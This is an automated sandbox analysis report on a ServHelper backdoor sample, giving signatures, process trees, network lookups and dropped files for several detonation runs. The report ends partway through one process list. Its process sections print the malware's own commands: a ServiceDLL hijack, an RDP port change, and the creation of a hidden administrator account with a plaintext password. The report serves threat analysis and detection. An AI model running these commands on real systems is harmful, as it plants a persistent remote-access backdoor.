Malware Analysis Report

2024-08-06 05:35

Sample ID 240410-l3c3esbf67
Target 282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8
SHA256 282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8
Tags
servhelper backdoor discovery exploit persistence trojan upx
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK Matrix
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral4 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral6 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral7 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral3 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral5 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral8 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
10/10

SHA256

282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8

Threat Level: Known bad

The file 282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8 was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence trojan upx

ServHelper

Grants admin privileges

Sets DLL path for service in the registry

Modifies RDP port number used by Windows

Possible privilege escalation attempt

Modifies file permissions

Checks computer location settings

Loads dropped DLL

Deletes itself

UPX packed file

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Program crash

NSIS installer

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Delays execution with timeout.exe

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-04-10 10:03

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-10 10:03

Reported

2024-04-10 10:05

Platform

win10v2004-20240226-en

Max time kernel

92s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" C:\Windows\system32\reg.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\shellbrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1604 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe C:\Windows\System32\cmd.exe
PID 5028 wrote to memory of 1836 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 5028 wrote to memory of 4472 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4472 wrote to memory of 4348 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 4472 wrote to memory of 3980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 4992 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 2108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 4828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 4876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 3672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 2208 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4472 wrote to memory of 4104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4472 wrote to memory of 3568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4472 wrote to memory of 232 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 232 wrote to memory of 3396 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4472 wrote to memory of 3492 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3492 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2676 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 5072 wrote to memory of 3292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4472 wrote to memory of 4976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4976 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4848 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 1892 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2168 wrote to memory of 4376 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4376 wrote to memory of 4572 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4792 wrote to memory of 4448 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4448 wrote to memory of 1244 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2772 wrote to memory of 3660 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3660 wrote to memory of 1252 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1908 wrote to memory of 632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 632 wrote to memory of 2744 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe

"C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout -t 15& powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\evil.ps1

C:\Windows\system32\timeout.exe

timeout -t 15

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\evil.ps1

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc Ghasar4f5 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc WqajC1V5 /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc WqajC1V5 /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc WqajC1V5 /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" SLVJLBBW$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" SLVJLBBW$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" SLVJLBBW$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc WqajC1V5

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc WqajC1V5

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc WqajC1V5

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 19.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 17.143.109.104.in-addr.arpa udp
US 8.8.8.8:53 dfsrakizimoy34ggf.xyz udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nsg2F3F.tmp\blowfish.dll

C:\Users\Admin\AppData\Local\Temp\nsg2F3F.tmp\System.dll

C:\Users\Admin\AppData\Local\Temp\nsg2F3F.tmp\nsUnzip.dll

memory/4472-46-0x00000255F0F40000-0x00000255F0F62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0j5p2fet.otl.ps1

memory/4472-51-0x00007FF97E210000-0x00007FF97ECD1000-memory.dmp

memory/4472-52-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

memory/4472-53-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\evil.ps1

memory/4472-55-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

memory/4472-56-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

C:\Windows\system32\rfxvmt.dll

memory/4472-72-0x00007FF97E210000-0x00007FF97ECD1000-memory.dmp

memory/4472-73-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

memory/4472-74-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

memory/4472-75-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

C:\Windows\Branding\mediasrv.png

C:\Windows\Branding\mediasvc.png

\??\PIPE\lsarpc

C:\Users\Admin\AppData\Local\Temp\uninst.dat.log

memory/4472-83-0x00007FF97E210000-0x00007FF97ECD1000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-10 10:03

Reported

2024-04-10 10:05

Platform

win10v2004-20240226-en

Max time kernel

93s

Max time network

96s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4320 wrote to memory of 2008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2008 -ip 2008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-04-10 10:03

Reported

2024-04-10 10:05

Platform

win10v2004-20240226-en

Max time kernel

147s

Max time network

156s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\blowfish.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2444 wrote to memory of 3548 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\blowfish.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\blowfish.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3548 -ip 3548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp

Files

memory/3548-0-0x0000000000400000-0x000000000040C000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-04-10 10:03

Reported

2024-04-10 10:05

Platform

win7-20240319-en

Max time kernel

122s

Max time network

135s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsUnzip.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsUnzip.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsUnzip.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1192 -s 228

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-10 10:03

Reported

2024-04-10 10:05

Platform

win7-20231129-en

Max time kernel

125s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" C:\Windows\system32\reg.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3028 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe C:\Windows\System32\cmd.exe
PID 3052 wrote to memory of 2816 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 3052 wrote to memory of 1780 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1780 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1780 wrote to memory of 2376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 1832 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 1984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 1856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 2852 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 2728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 2824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1780 wrote to memory of 1868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1780 wrote to memory of 1868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1780 wrote to memory of 1868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1780 wrote to memory of 1584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1780 wrote to memory of 1584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1780 wrote to memory of 1584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1780 wrote to memory of 2568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1780 wrote to memory of 2568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1780 wrote to memory of 2568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 2568 wrote to memory of 2040 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2568 wrote to memory of 2040 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2568 wrote to memory of 2040 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1780 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1780 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1780 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1068 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1068 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1068 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 324 wrote to memory of 596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 324 wrote to memory of 596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 324 wrote to memory of 596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 596 wrote to memory of 604 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 596 wrote to memory of 604 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 596 wrote to memory of 604 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1780 wrote to memory of 540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1780 wrote to memory of 540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1780 wrote to memory of 540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe

"C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout -t 15& powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\evil.ps1

C:\Windows\system32\timeout.exe

timeout -t 15

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\evil.ps1

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

